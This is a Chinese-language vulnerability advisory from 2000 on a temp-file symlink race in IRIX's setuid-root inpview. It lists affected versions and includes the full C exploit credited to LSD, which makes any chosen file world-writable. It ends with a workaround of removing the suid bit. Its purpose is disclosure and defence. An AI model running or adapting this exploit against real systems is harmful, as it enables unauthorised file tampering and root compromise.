IRIX inpview 链接竞争漏洞
发布日期:2000-08-04
更新日期:2000-08-04
受影响系统:
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3m
SGI IRIX 6.5.3f
SGI IRIX 6.5.3
SGI IRIX 6.5.2m
SGI IRIX 6.5.1
SGI IRIX 6.5
描述:
某些版本IRIX下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文
件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的
setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。inpview本身
是一个网络多媒体集成工具。
<* 来源:LSD contact@lsd-pl.net *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*## copyright LAST STAGE OF DELIRIUM jan 2000 poland *://lsd-pl.net/ #*/
/*## /usr/lib/InPerson/inpview #*/
/* sets rw-rw-rw permissions */
#include <sys/types.h>
#include <dirent.h>
#include <stdio.h>
main ( int argc, char * argv[] )
{
DIR * dirp;
struct dirent * dentp;
printf( "copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/\n" );
printf( "/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n" );
if ( argc != 2 )
{
printf( "usage: %s file\n", argv[0] );
exit( -1 );
}
if( !fork() )
{
nice( -20 );
sleep( 2 );
close( 0 );
close( 1 );
close( 2 );
execle( "/usr/lib/InPerson/inpview", "lsd", 0, 0 );
exit( 0 );
}
printf( "looking for temporary file... " );
fflush( stdout );
chdir( "/var/tmp" );
dirp = opendir( "." );
while ( 1 )
{
if ( ( dentp = readdir( dirp ) ) == NULL )
{
rewinddir( dirp );
continue;
}
if ( !strncmp( dentp->d_name, ".ilmpAAA", 8 ) )
{
break;
}
}
closedir( dirp );
printf( "found!\n" );
while ( 1 )
{
if ( !symlink( argv[1], dentp->d_name ) )
{
break;
}
}
sleep( 2 );
unlink( dentp->d_name );
execl( "/bin/ls", "ls", "-l", argv[1], 0 );
}
建议:
暂无
临时解决办法:
去掉它的suid root属性
浏览次数:5836
严重程度:0(网友投票)
